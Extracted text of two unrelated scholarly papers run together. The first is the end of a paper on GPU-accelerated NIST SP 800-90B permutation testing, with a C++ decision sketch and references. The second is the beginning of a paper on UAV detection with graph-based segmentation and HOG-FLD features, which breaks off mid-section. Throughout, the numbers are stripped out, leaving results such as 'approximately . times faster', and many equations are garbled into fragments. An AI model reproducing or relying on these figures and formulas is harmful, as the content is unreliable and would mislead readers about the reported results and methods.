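            return false;                               // reject the iid assumption
    return true;
}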
since the size of the global memory in device a is gb, we set n to , , , , , , , , and , . in device b, the size of the global memory is gb, and so we set n to , , , , and , . table presents the execution time of the gpu-based parallel implementation of the permutation testing and the usage of global memory (calculated by referring to table ), according to the value n . when truerand was used as input data, each of the kernel shuffling and statistical test was called once, and then the noise source was determined as the iid through the test results. therefore, in an environment (e.g., hardware rng) where the noise sources are likely to be iid, it is analyzed that it is appropriate even if the user sets n to , . in gettickcount, each kernel was called d , /ne times and then was determined as the non-iid. the execution time multiplied by d , /ne, when truerand was the input, gives a similar result to the execution time when gettickcount was the input. as shown in table , in the case of gettickcount, as n increases, the execution time decreases and then increases again. each thread used the global memory of million bytes. therefore, we analyzed it as a result of the latency derived by increasing access to global memory as the number of switching by the warp unit increases. it is appropriate to select n by considering all of the global memory usages, execution time determined as an iid noise source, and execution time determined as a non-iid noise source in a general environment. as a result of the experiment, it is appropriate to set n to , when using device a and to select n to , when using device b. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performances of our gpu-based program and nist program written in c++ according to noise source (without the compression test). execution time (s) name of noise source truerand gettickcount sample size (bit) nist program (cpu single-thread) . . . . . . device a nist program (cpu multi-thread) . . . . . . proposed program (gpu) . . . . . . nist program (cpu multi-thread) . . . . . . device b proposed program (gpu) . . . . . . performance evaluation of gpu-based permutation testing with nist program according to noise source for each noise source, we measured the performances of our gpu-based program and the nist program. two noise sources, truerand and gettickcount, were used in the experiment and the sample size of each noise source is one of , , and bits. we set n to , and , , respectively, when using device a and device b, reflecting the result of the previous experiment. we set t to . the nist program, written in c++, is compatible with openmp and can make , iterations work in a multi-threaded environment. in this experiment, the nist program running on the cpu used cpu threads in device a and eight cpu threads in device b (table ). thus, we compared our performance with permutation testing in the single-threaded and multi-threaded nist programs. since our gpu-based parallel implementation of the permutation testing was designed without the compression algorithm, we measured the performance of the nist program without the compression test. table presents the execution times of the nist program on the cpu and the proposed program on the gpus, measured for each noise source. for truerand, the performance of the proposed program was approximately . times better than that of the single-threaded nist program. it was about . 
times better than the performance of the multi-threaded nist program. in the case of gettickcount, the performance of our program was improved by approximately . times and about . times over the single-threaded and the multi-threaded nist programs. in table , the minimum performance improvement of the proposed program for truerand was not higher than that of the program for gettickcount. as shown in algorithm , the number of iterations (up to , ) in permutation testing varies depending on whether eq. ( ) is satisfied. the nist program on the cpu was executed as one statistical test unit. if the accumulated results of the statistical test satisfied eq. ( ), that test was no longer performed in the iterations. on the other hand, our program on the gpu was executed as an n unit of statistical tests, and if the results of all tests satisfied eq. ( ), it was not repeated. namely, the kernel shuffling and statistical test were not called again. if the noise source was likely to be determined as the iid from the permutation testing, there is a high probability that all of the statistical tests satisfy eq. ( ). the nist kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table execution time of the gpu-based parallel implementation of permutation testing with/with- out gpu boost (device a). execution time (s) name of noise source with gpu boost without gpu boost truerand- bit . . truerand- bit . . truerand- bit . . gettickcount- bit . . gettickcount- bit . . program operating as one test unit repeatedly performed each test less than n times and then determined truerand as the iid; however, in the case of gettickcount, both the nist program and our program performed , iterations and determined gettickcount as the non-iid. therefore, it is analyzed that the difference in performance improvement of our program by noise source is reasonable. nvidia gpu boost technology boosts the cuda core frequency from , to , mhz in device a. the execution time of our gpu-based program without gpu boost is presented in table . without gpu boost, the performance decreased by up to . times compared to the case with gpu boost. it is analyzed that the difference in performance with or without gpu boost is not significant. the performance of our gpu-based program without gpu boost is approximately to times better than the single-threaded nist program and about to times better than the multi-threaded nist program. performance evaluation of our hybrid cpu/gpu program we measured the performance of the proposed hybrid cpu/gpu program and the nist program using truerand and gettickcount, whose sample size is bits. both programs included the compression test. figure presents the performance of each program. a base- logarithmic scale is used for the y -axis. since the nist program performs the compression tests, it takes longer than the runtime of the nist program without the compression test written in table . in particular, when determining gettickcount to be non-iid, the compression test runs almost , times, and so the nist program, in this case, takes much longer than the runtime written in table . our hybrid cpu/gpu program performs the compression tests using openmp only when our gpu-based program determined the noise source (e.g., truerand) as the iid. as shown in fig. , it is reasonable that the execution time of our hybrid program for truerand is longer than that of our gpu-based program presented in table . 
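the decision logic of the hybrid program can be outlined as follows; this is a simplified c++ sketch under our own names (gpuPermutationTestingIID, compressionStatistic, and shuffleCopy are placeholders for the gpu stage, the bzip2-based compression test statistic, and a seeded shuffle), and unlike the actual implementation it always runs the full 10,000 compression-test iterations instead of stopping early.

#include <vector>

// placeholders (assumptions): the gpu-based permutation testing without the
// compression test, the compression test statistic, and a seeded fisher–yates
// shuffle that returns a shuffled copy of the data.
bool gpuPermutationTestingIID(const std::vector<unsigned char>& data);
long compressionStatistic(const std::vector<unsigned char>& data);
std::vector<unsigned char> shuffleCopy(const std::vector<unsigned char>& data, int seed);

// hybrid cpu/gpu decision: the openmp compression tests run only when the gpu
// stage has already concluded "iid"; if the gpu stage rejects, the final answer
// is "non-iid" and no compression test is performed.
bool hybridPermutationTesting(const std::vector<unsigned char>& originalData) {
    if (!gpuPermutationTestingIID(originalData))
        return false;                                   // non-iid already; skip compression tests

    const long originalStat = compressionStatistic(originalData);
    long c0 = 0, c1 = 0;                                // counters for the compression test

    #pragma omp parallel for reduction(+:c0,c1)
    for (int j = 0; j < 10000; ++j) {
        const long stat = compressionStatistic(shuffleCopy(originalData, j));
        if (stat > originalStat)        ++c0;
        else if (stat == originalStat)  ++c1;
    }
    // eq. (1) applied to the compression test alone decides the final result
    return !((c0 + c1 <= 5) || (c0 >= 9995));
}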
since gettickcount was determined as the non-iid by our gpu-based program, the compression test does not run in our hybrid program. therefore, our hybrid program has the same execution time as our gpu-based program in table . compared to the single-threaded nist program, the proposed hybrid cpu/gpu program had an improved performance of approximately . to . times. compared kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure execution time of our hybrid program and nist program. full-size doi: . /peerjcs. /fig- with the multi-threaded nist program, the performance improved about . to . times. the nist program always performed up to , compression tests using openmp; however, our hybrid program performed the compression tests using openmp only if the noise source was determined as the iid by all statistical tests in our gpu-based program. therefore, our hybrid program is efficient when determining the noise source as the non-iid than when determining the noise source as the iid. when the nist program applies our implementation method, it first performs the shuffling and statistical tests (at most , times). if it determined that the noise source was non-iid by these results, it does not run the shuffling and the compression tests. when the input is non-iid, the nist program (with the compression test) had the same runtime presented in table . otherwise, the nist program has the same runtime as the original program. therefore, our hybrid cpu/gpu program sped the process about times over the multi-threaded nist program applied our method for iid noise sources ( -bit sample size). our program had an improved performance of approximately for the non-iid input. conclusions the security of modern cryptography is heavily reliant on sensitive security parameters such as encryption keys. rngs should provide cryptosystems with ideal random bits, which are independent, unbiased, and, most importantly, unpredictable. to use a secure rng, it is necessary to estimate its input entropy as precisely as possible. the nist offers kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. two programs for entropy estimations, as outlined in sp - b. however, much time is required to manipulate several noise sources for an rng. we proposed gpu-based parallel implementation of the permutation testing, which required the longest execution time in the iid test of sp - b. our gpu-based implementation excluded the compression test that is unsuitable for cuda version implementation. our gpu-based method was designed to use massive parallelism of the gpu by balancing the execution time for statistical tests, as well as optimizing the use of the global memory for data shuffling. we experimentally compared our gpu optimization with the nist program excluded the compression test. our gpu-based program was approximately to times faster than the single-threaded nist program. moreover, our proposal improved the performance by about to times over the multi-threaded nist program. we proposed the hybrid cpu/gpu implementation of the permutation testing. it consists of our gpu-based program and the compression tests that run using openmp. experimental results show that the performance of our hybrid program is approximately to times better than that of the multi-threaded nist program (with compression test). 
most noise sources are non-iid, and our program has better performance when determining the noise source as the non-iid. it is expected that the time required for analyzing the rng security will be significantly reduced for developers and evaluators by using the proposed approach, thereby improving the validation efficiency in the development of cryptographic modules. it is expected that our optimization techniques might be adapted to the problems of performing several tests or processes on thousands or more of data, each of which is large. additional information and declarations funding this work was supported by an institute for information & communications technology promotion (iitp) grant funded by the korean government (msit) (no. - - , research on the security of random number generators and embedded devices). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: institute for information & communications technology promotion (iitp) grant: no. - - . competing interests the authors declare there are no competing interests. author contributions • yewon kim conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • yongjin yeom conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and source code are available at github: https://github.com/yeah kim/yeah_ gpu_sp _ b_iid. references barker e, kelsey j. . recommendation for the entropy sources used for random bit gen- eration. national institute of standards and technology nist special publication (sp) - b (draft). bernstein dj, chang y-a, cheng c-m, chou l-p, heninger n, lange t, van someren n. . factoring rsa keys from certified smart cards: coppersmith in the wild. in: sako k, sarkar p, eds. advances in cryptology - asiacrypt . asiacrypt . lecture notes in computer science, vol. . berlin, heidelberg: springer, – doi . / - - - - _ . ding y, peng z, zhou y, zhang c. . android low entropy demystified. in: ieee international conference on communications (icc). piscataway: ieee, – . heninger n, durumeric z, wustrow e, halderman ja. . mining your ps and qs: detection of widespread weak keys in network devices. in: presented as part of the st usenix security symposium (usenix security ). – . iso/iec- . . information technology —security techniques —test and analysis methods for random bit generators within iso/iec and iso/iec . kang j-s, park h, yeom y. . on the additional chi-square tests for the iid assump- tion of nist sp - b. in: th annual conference on privacy, security and trust (pst). piscataway: ieee, – . kaplan d, kedmi s, hay r, dayan a. . attacking the linux prng on android: weaknesses in seeding of entropic pools and low boot-time entropy. in: th usenix workshop on offensive technologies (woot ). kelsey j. . entropy sources and you: an overview of sp - b. in: random bit generation workshop. kim sh, han d, lee dh. . predictability of android openssl’s pseudo random number generator. in: proceedings of the acm sigsac conference on computer & communications security. new york: acm, – . 
li p, zhou s, ren b, tang s, li t, xu c, chen j. . efficient implementation of lightweight block ciphers on volta and pascal architecture. journal of information security and applications : – doi . /j.jisa. . . . li q, zhong c, zhao k, mei x, chu x. . implementation and analysis of aes encryption on gpu. in: ieee th international conference on high performance computing and communication & ieee th international conference on embedded software and systems. piscataway: ieee, – . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/yeah kim/yeah_gpu_sp _ b_iid https://github.com/yeah kim/yeah_gpu_sp _ b_iid http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /peerj-cs. ma j, chen x, xu r, shi j. . implementation and evaluation of different parallel designs of aes using cuda. in: ieee th international conference on high performance computing and communication & ieee th international conference on embedded software and systems. piscataway: ieee, – . michaelis k, meyer c, schwenk j. . randomly failed! the state of randomness in current java implementations. in: dawson e, ed. topics in cryptology – ct-rsa . ct-rsa . lecture notes in computer science. vol. . berlin, heidelberg: springer, – doi . / - - - - _ . müller s. . linux random number generator - a new approach. available at https: //chronox.de/lrng/doc/lrng.pdf (accessed on february ). neves s, araujo f. . on the performance of gpu public-key cryptography. in: asap - nd ieee international conference on application-specific systems, architectures and processors. piscataway: ieee, – . nist. . entropyassessment. github. available at https://github.com/usnistgov/ sp - b_entropyassessment (accessed on february ). nist, cse. . implementation guidance for fips pub - and the cryptographic module validation program. available at http://csrc.nist.gov/groups/stm/cmvp/ documents/fips - /fips ig.pdf (accessed on february ). nvidia. a. cuda c++ best practices guide. in: nvidia, aug. available at https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html (accessed on february ). nvidia. b. cuda c++ programming guide. nvidia, aug. available at https:// docs.nvidia.com/cuda/cuda-c-programming-guide/index.html (accessed on february ). openmp. . openmp application programming interface. available at https://www. openmp.org/wp-content/uploads/openmp-api-specification- . .pdf (accessed on february ). pan w, zheng f, zhao y, zhu w-t, jing j. . an efficient elliptic curve cryptography signature server with gpu acceleration. ieee transactions on information forensics and security ( ): – . patel ra, zhang y, mak j, davidson a, owens jd. . parallel lossless data compression on the gpu. piscataway: ieee. ristenpart t, yilek s. . when good randomness goes bad: virtual machine reset vulnerabilities and hedging deployed cryptography. in: proceedings of network and distributed security symposium (ndss). san diego, ca, usa: the internet society, – . schneier b, fredrikson m, kohno t, ristenpart t. . surreptitiously weakening cryptographic systems. in: iacr cryptol. eprint arch. vol. . . available at https://eprint.iacr.org/ / (accessed on february ). seward j. . bzip and libbzip , version . . : a program and library for data compression. available at https://sourceware.org/bzip / . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 
/ - - - - _ https://chronox.de/lrng/doc/lrng.pdf https://chronox.de/lrng/doc/lrng.pdf https://github.com/usnistgov/sp - b_entropyassessment https://github.com/usnistgov/sp - b_entropyassessment http://csrc.nist.gov/groups/stm/cmvp/documents/fips - /fips ig.pdf http://csrc.nist.gov/groups/stm/cmvp/documents/fips - /fips ig.pdf https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html https://www.openmp.org/wp-content/uploads/openmp-api-specification- . .pdf https://www.openmp.org/wp-content/uploads/openmp-api-specification- . .pdf https://eprint.iacr.org/ / https://sourceware.org/bzip / http://dx.doi.org/ . /peerj-cs. shastry k, pandey a, agrawal a, sarveswara r. . compression acceleration using gpgpu. in: ieee rd international conference on high performance computing workshops (hipcw). piscataway: ieee, – . stevens m, bursztein e, karpman p, albertini a, markov y. . the first collision for full sha- . in: annual international cryptology conference. heidelberg: springer, – . sönmez turan m, barker e, kelsey j, mckay k, baish m, boyle m. . recommenda- tion for the entropy sources used for random bit generation. in: national institute of standards and technology. nist special publication (sp) - b ( nd draft). sönmez turan m, barker e, kelsey j, mckay k, baish m, boyle m. . recommen- dation for the entropy sources used for random bit generation. in: national institute of standards and technology. nist special publication (sp) - b. available at https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp. - b.pdf . vaidya b. . hands-on gpu-accelerated computer vision with opencv and cuda: effective techniques for processing complex image data in real time using gpus. birmingham, uk: packt publishing ltd. yoo t, kang j-s, yeom y. . recoverable random numbers in an internet of things operating system. entropy ( ): doi . /e . zhu s, ma y, chen t, lin j, jing j. . analysis and improvement of entropy esti- mators in nist sp - b for non-iid entropy sources. iacr transactions on symmetric cryptology ( ): – doi . /tosc.v .i . - . zhu s, ma y, li x, yang j, lin j, jing j. . on the analysis and improvement of min- entropy estimation on time-varying data. ieee transactions on information forensics and security : – . kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp. - b.pdf http://dx.doi.org/ . /e http://dx.doi.org/ . /tosc.v .i . - http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) fast aerial uav detection based on image segmentation and hog-fld feature fusion li xiaoping school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: @qq.com lei songze school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: lei_sz@ .com wang yanhong school of science xi’an technological university xi’an, , shaanxi e-mail: @qq.com xiao feng a , tian penghui * b school of computer science and engineering xi’an technological university xi’an, , shaanxi e-mail: a @qq.com b @qq.com abstract—in order to detect non-cooperative target uav quickly and accurately, a novel method of uav detection method based on graph theory and hog-fld feature fusion is presented in this paper. 
in order to avoid the time-consuming full search, the candidate areas of the uav are obtained through the selective search of the image segmentation and the similarity, and the features are extracted through the method of gradient orientation histogram fusion fld linear to train the svm classifier with generalization ability to identify the uav. the method can detect the uav quickly and accurately under complicated background and circumstances of various position and angle. compared with the sliding window method based on image segmentation and hog+svm, the experimental results show that the speed of this method has been obviously improved with the same recognition accuracy. keywords-image segmentation; graph theory; hog; fld; svm i. introduction in recent years, uav have been widely used in the military field. due to its advantages of small size, low cost, low noise, high maneuverability, high concealment and superior stability, uav can be applied to various of fields in the world for the purpose of reconnoitering enemy troops, detecting danger zone, tracking target, electronic interference, communication relay, and even completing the task of attack by carrying small-scale offensive weapons. therefore, to detect non-cooperative uav is necessary. to completed the task of independently identifying aerial non-cooperative uav and monitoring in real time to border areas of different country could realize economic and extensive border surveillance and play a security role for the country and society. recently, on the uav detection technology of domestic and foreign scholars is rare. however, the difficulty of the uav detection technology is mainly that the uav in the picture is easily affected by the position, the angle, the distance from the camera and its own structure, which makes it difficult to detect the uav. above problem is extremely similar to difficulty of target detection technology and needs to research and practice. at present, the common methods used in target international conference on sensor network and computer engineering (icsnce ) detection are mainly following methods: the method based on the optical flow field [ ], the inter-frame difference method and the background detection based on the target detection method. optical flow target detection is a method of moving target, which the basic principle is: that a velocity vector is given to the moving target pixel, and the image will form an optical flow field, and its background will be obviously distinguished from the moving target vector. in the meanwhile, you can get the location of the target by analyzing dynamic image. this method is suitable for all kinds of backgrounds, and it has no requirement for background. its drawbacks are that the number of pixels is too large, the distribution of optical motion fields is too wide and inaccurate, and the computation is too large. the method of inter-frame difference [ ] is used to obtain the foreground of the target by using the threshold segmentation method to obtain the difference between the pixels of the adjacent two frames, whose calculation is small, and the ability of target recognition is poor when the illumination changes. in order to ensure the accuracy and integrity of uav target detection, the traditional method of sliding window to detect uav requires that the sample picture and the picture to be tested need to be scaled until the target of the image to be detected is less than or equal to the template size and the detection is stopped. 
so that the uav which is larger than or equal to the template size can also be detected accurately after adjusting the pixel size of the whole image to be tested. however, the hog feature [ - ] is extracted after the image is scaled. extracting hog feature need to traverse the whole image by sliding window [ ] until the edge contour feature of high dimension can be obtained by matching, so that the traversal need to take a long time, which leads to the slow generation of feature descriptors, and the scale of each level requires a large amount of computation. an image segmentation method based on graph theory and hog-fld feature fusion is proposed for uav detection in this paper. this method is divided into training stage and test stage. in the training stage, it is necessary to unify and gray-scale processed the pixel size of positive and negative samples set be collected in advance, and then it could obtain the feature vector with small dimension which can stably describe the uav contour feature after the feature extraction is carried out by using hog-fld feature fusion method. finally, the feature vector is input into the support vector machine model, the support vector machine classifier is trained after a series of statistical learning. in the test stage, the candidate regions are screened out by using the segmentation method based on graph theory and are extracted features according to the feature extraction method of the training stage, and then the extracted features are input into the trained classifier to carry out classification and detecting whether the candidate area includes the target uav. image segmentation uses the connected method of graph [ ] or the minimum spanning tree to merge the region, which mainly determines whether to merge the two regions according to the similarity of each region of the image. this method could not only obtain the global features of the image and the candidate area of uav, but also the calculation speed is very fast and the processing efficiency is also high. the features obtained by combining the hog features of gradient histogram and the fisher linear discriminant analysis (fld) are selected as the features of the statistical learning training classifier in feature extraction stage. because of the advantages that the features of small dimension and good robustness and good classification ability extracted by hog-fld feature fusion are rarely affected by the changes of local illumination, background change, target location and angle change, it is easier to train a classifier that is easy to classify and has strong generalization ability. ii. segmentation method based on graph theory to obtain region of interest a. segmentation method based on graph theory image segmentation is a way to separate the image into regions with different characteristics and separate the interested objects from the background in the segmented blocks. let interest objects and backgrounds in segmented regions show a clear sense of contrast based on human visual effects. image segmentation method plays an important role in further international conference on sensor network and computer engineering (icsnce ) analysis of image such as image compression and image recognition. the image segmentation method based on graph theory (graph-based image segmentation) and the region merging method are selected to segment the image in this paper. 
the image segmentation method based on graph theory takes the image as the object transforming the image into the right undirected graph, and uses the connected branch method of graph [ ] to segment the image, and then it could obtain the region block. the region merging method is to merge the segmented region blocks according to the specific merging rules. because of great different characteristics of the uav and the background in texture, color, size and degree of agreement, regional block of great different characteristics need to be decomposed and regional block of small different features need to be merged [ ], which follows the principle of [ ] the optimal segmentation. b. acquisition principle of uav region of interest the image contains information such as shape, size, color, texture and so on. image will be segmented after the whole image is traversed by the search algorithm of graph theory. in the graph theory, the definition of the image - to - graph [ ] is described as follows: ),( evg  is an undirected graph with v as its vertex and e as its edge set. any edge evv ji ),( is defined as a weight function ),( ji vvw greater than zero. any vertex ji vv , represents the pixel point of the graph to be processed in graph theory, and the weight of any edge represents the gray difference, the distance or some other features between the adjacent pixels of i v , j v and ),( ji vv in an image. using graph cuts algorithm [ ], the graph g is divided into several disjoint independent regions, and the region is defined as )',(' evg  , e' is a subset of e. the regions of the picture is segmented by the algorithm of minimun spanning tree(mst) [ ] that the difference of the pixels in the same region is measured through the maximum weight edge, of which the largest weight edge of segmentation region values are defined as follows: )(max)( ),( ecint ecmste     vc   where c is the generated partition region, and ),( ecmst represents the set of partitioned regions or the minimun spanning tree [ ] that c generates in e. the resulting dissimilarity between pixels within the segmented region could also be understood as the weight of the minimum edge that connects the vertices of two segmented regions, as defined below: )),((min),( ),(,, ji evvcvcv vvwccdif jiji    when there is no edge connection between the two partitioned regions, there is ),( ccdif . the condition for the appearance of its partition boundary is defined as follows:      otherwisefalse ccmintccdififtrue ccd ),(),(, ),(  if true in the expression is satisfied, then the boundary is represented, then the region is segmented. otherwise, it is merged. where the smallest internal difference of division is defined as follows: ))()(),()(min(),( ccintccintccmint    () is a threshold function, which is used to control the merging degree of the image segmentation region, which is defined as ckc /)(  , where c is the number of the segmentation region or the vertex, and k is a constant parameter that is used to control the coarse granularity of its image segmentation area. the segmentation effect is shown in figure (b).that small regions will be merged means detecting whether the segmented region meets the regional boundary conditions, if not, then they will be merged. 
the regional boundary conditions could be measured by the following four types of similarity in the image: ) color [ ] similarity ),( jicolour rrs means that bins one-dimensional color histogram of the three color channels international conference on sensor network and computer engineering (icsnce ) are acquired after image is normalized. or that means that the three color components are combined into one dimensional feature vector, so that each region of the image could be represented as a dimensional feature vector },...,{ n iii ccc  , and the color calculation formula of the region is: )()( )()( ),min(),( ji jjii t n k k j k ijicolour rsizersize crsizecrsize c ccrrs        where )( irsize is the number of pixels contained in the region( i r ), and the number of pixels contained in the new region is )()( ji rsizersize  . ) texture [ ] similarity ),( jitexture rrs means that calculate gaussian differential for different directions of three color channels separately (its  ), bins one-dimensional histogram of each direction of three color channels is respectively obtained after image is normalized, and then the region could be expressed as a -dimensional vector },...,{ n iii ttt  , and its texture similarity calculation formula is as follows:    n k k j k ijitexture ttrrs ),min(),(  ) dimension similarity ),( jisize rrs , which is used to merge smaller regions as early as possible. its formulas are as follows: )( )()( ),( imsize rsizersize rrs ji jisize    where im refers to the whole image. ) the matching similarity ),( ji rrfill is used to merge the intersected regions as soon as possible. its account form is as follows: )( )()()( ),( imsize rsizersizebbsize rrfill iiij ji   ( ) the similarity set s could be gotten by combining these four kinds of similarity, and the formula of the combination is as follows: ),(),( ),(),(),( jifilljisize jitexturejicolourji rrsarrsa rrsarrsarrs    in order to judge whether the boundary condition of } , {ia satisfies the similarity. the two segmented region blocks i r and j r which have the largest similarity are merged and a region t r is obtained after the similarity degree of the segmented regions in the similarity set s is compared and sorted. the similarity between two adjacent regions of i r and j r in the set s is removed in the meanwhile. then according the step of this method , we begin to calculate the similarity between the new merged region t r and its current adjacent regions, and we add this similarity to the similarity set s again. at the same time, we also add t r to the region set r , and we finally label the region with a rectangular box. the segmentation effect is shown in figure (c) and (d). international conference on sensor network and computer engineering (icsnce ) a) original map b) segmentation of graphs based on graph cuts algorithm c) segmentation graph of the algorithm in this paper d)the partitioned graph after adjusting parameters figure . image segmentation iii. target uav detection based on hog-fld feature fusion and svm detection the method could be divided into two stages from the perspective of practice: training and testing. in the training stage, the window with constant shape and size is used to traverse the whole uav or non-uav sample images, and the feature is extracted by hog-fld feature fusion method. 
iii. target uav detection based on hog-fld feature fusion and svm

in practice, the detection method is divided into two stages: training and testing. in the training stage, a window of constant shape and size is used to traverse the whole set of uav and non-uav sample images, and features are extracted by the hog-fld feature fusion method. a computable feature vector is obtained to describe the contour of the image, which is robust and easy to classify, and the svm classifier [ - ] for uav detection is obtained by statistical analysis and learning of these eigenvectors. in the testing stage, the same method as in the training stage is first used to extract features from the regions to be detected, and the candidate targets of these regions are then classified by the trained svm classifier to determine whether the target in a candidate region is a uav.

a. feature extraction from hog-fld feature fusion

because the edge contour feature of a uav has strong stability and extensibility, the hog feature, which has a strong ability to describe contours, is extracted from the data set. however, because of the large dimension of the hog feature vector, it is unfavorable for training the classifier. in order to train a classifier with good classification ability, it is necessary to reduce the dimension of the extracted hog feature by fld [ ] feature fusion and finally obtain a feature vector with small dimension. to sum up, feature extraction based on hog-fld feature fusion is adopted in this article.

the basis of feature extraction in this article is the histogram of oriented gradients (hog). the idea of the algorithm is as follows: calculate the gradient of the selected image; divide the whole image into rectangular cells of fixed and equal size, each cell containing m×m pixels; divide the gradient orientations into a number of undirected channels (or directed channels), and vote the gradient histogram of each orientation, where the voting weight is the gradient magnitude calculated earlier. the divided cell units are then composed into fixed blocks of the same size; each block contains n×n cells, and the local eigenvector corresponding to each block is normalized in order to reduce the effect of illumination on the results. the feature vectors of these blocks are combined to form the hog feature vector of the image.

the steps of extracting the hog feature are as follows: gray the positive sample image of the uav and filter the input image with the gamma correction method, so that the image achieves the standard contrast of the color space and the effects of local shadows and light changes are reduced; divide the image into a certain number of cells and form a fixed number of cells into blocks of equal size as described above; classify the gradient range according to the above-mentioned rules; calculate the cell features in these blocks and finally connect all the blocks together to obtain the feature vector of the whole target uav image. the first formula below performs the normalization, the next two calculate the gradient components of each pixel, and the last two calculate the magnitude and direction of the gradient.
$$v_g'=\frac{v_g}{\|v_g\|+\varepsilon}$$

$$g_x(x,y)=p_i(x+1,y)-p_i(x-1,y),\qquad g_y(x,y)=p_i(x,y+1)-p_i(x,y-1)$$

$$s(x,y)=\sqrt{g_x(x,y)^2+g_y(x,y)^2},\qquad \theta(x,y)=\arctan\!\big(g_y(x,y)/g_x(x,y)\big)$$

where $v_g'$ is the result of histogram normalization and $v_g$ is the extracted histogram vector; $p_i(x+1,y)$, $p_i(x-1,y)$, $p_i(x,y+1)$ and $p_i(x,y-1)$ denote the pixel values at the corresponding neighboring positions; $g_x(x,y)$ and $g_y(x,y)$ denote the gradient components in the horizontal and vertical directions at pixel $(x,y)$; and $s(x,y)$ and $\theta(x,y)$ denote the magnitude of the gradient vector and the angle of the gradient direction.

in this article, a window of fixed pixel size is used to scan the sample images and the image to be detected, with a fixed scanning step in both the horizontal and vertical directions. the window is divided into cells of equal pixel size, and every four adjacent cells (up, down, left and right) form a pixel block, so that a window contains a fixed number of pixel blocks. the hog feature descriptor of a window is generated from all its pixel blocks according to the calculation steps of hog. the specific hog computation is illustrated in figure (principle diagram of the hog algorithm, showing the pixel cells, the pixel blocks, the detection window and the scanning step).

on the basis of the hog feature, a linear subspace is constructed by using fisher linear discriminant analysis (fld) [ ]. by solving for the optimal projection matrix, the projection matrix used for feature extraction on the training set is obtained, and the cosine similarity $s_{\cos}$ of the projection vectors is taken as the similarity measure. the purpose is to reduce the intra-class scatter $S_w$ as much as possible and to increase the inter-class scatter $S_b$ as much as possible; in other words, in the training set, the sample data of the same uav should be as close as possible and the sample data of different uavs should be far apart. in this way, features with classification ability are extracted. for a c-class problem, the inter-class scatter $S_b$ and the intra-class scatter $S_w$ are defined as follows:

$$S_b=\sum_{i=1}^{c} n_i(\mu_i-\mu)(\mu_i-\mu)^{T}$$

$$S_w=\sum_{i=1}^{c}\sum_{x_k\in\omega_i}(x_k-\mu_i)(x_k-\mu_i)^{T}$$

where $\mu_i$ denotes the mean of class $\omega_i$, $\mu$ denotes the mean of the total sample, and $n_i$ denotes the number of samples in class $\omega_i$. the optimal projection matrix $W_{opt}$ can be obtained by solving the optimization problem below, where $S_w$ must be a nonsingular matrix (that is, the total number of training samples $n$ must be greater than the characteristic dimension of the uav image):

$$W_{opt}=\arg\max_{W}\frac{|W^{T}S_b W|}{|W^{T}S_w W|}$$

$W_{opt}$ can also be obtained by solving the generalized eigenvalue problem:

$$S_b w=\lambda S_w w$$

in order to solve the problem that the intra-class scatter matrix $S_w$ may be singular, principal component analysis (pca) is first used to reduce the dimension of the feature space (dimensionality reduction to n-c), and then fisher linear discriminant analysis (fld) is applied.
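the scatter matrices and the generalized eigenvalue problem above can be sketched as follows, with a pca step first so that $S_w$ stays nonsingular, as described in the text. the output dimension, the small ridge added to $S_w$ and the use of scipy/scikit-learn routines are assumptions made for illustration.

```python
import numpy as np
from scipy.linalg import eigh
from sklearn.decomposition import PCA

def fisher_projection(X, y, out_dim):
    """solve S_b w = lambda S_w w after a PCA step keeping at most n - c components."""
    classes = np.unique(y)
    pca = PCA(n_components=min(X.shape[1], X.shape[0] - len(classes)))
    Z = pca.fit_transform(X)
    mu = Z.mean(axis=0)
    d = Z.shape[1]
    Sb = np.zeros((d, d))
    Sw = np.zeros((d, d))
    for c in classes:
        Zc = Z[y == c]
        mc = Zc.mean(axis=0)
        Sb += len(Zc) * np.outer(mc - mu, mc - mu)   # inter-class scatter
        Sw += (Zc - mc).T @ (Zc - mc)                # intra-class scatter
    # generalized symmetric eigenproblem; keep the leading eigenvectors
    vals, vecs = eigh(Sb, Sw + 1e-6 * np.eye(d))
    W = vecs[:, np.argsort(vals)[::-1][:out_dim]]
    return pca, W

def cosine_similarity(a, b):
    # s_cos = <a, b> / (||a|| ||b||), used to compare projected vectors
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))
```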
the projection vector $y$ of a test sample $x$ is obtained according to:

$$y=W_{opt}^{T}x$$

the cosine similarity $s_{\cos}$ is used as the similarity measure of the projection vectors, where the cosine similarity of the vectors $a=\{a_1,\ldots,a_n\}$ and $b=\{b_1,\ldots,b_n\}$ is defined as:

$$s_{\cos}=\frac{\langle a,b\rangle}{\|a\|\,\|b\|}=\frac{\sum_{i=1}^{n}a_i b_i}{\|a\|\,\|b\|}$$

b. support vector machine

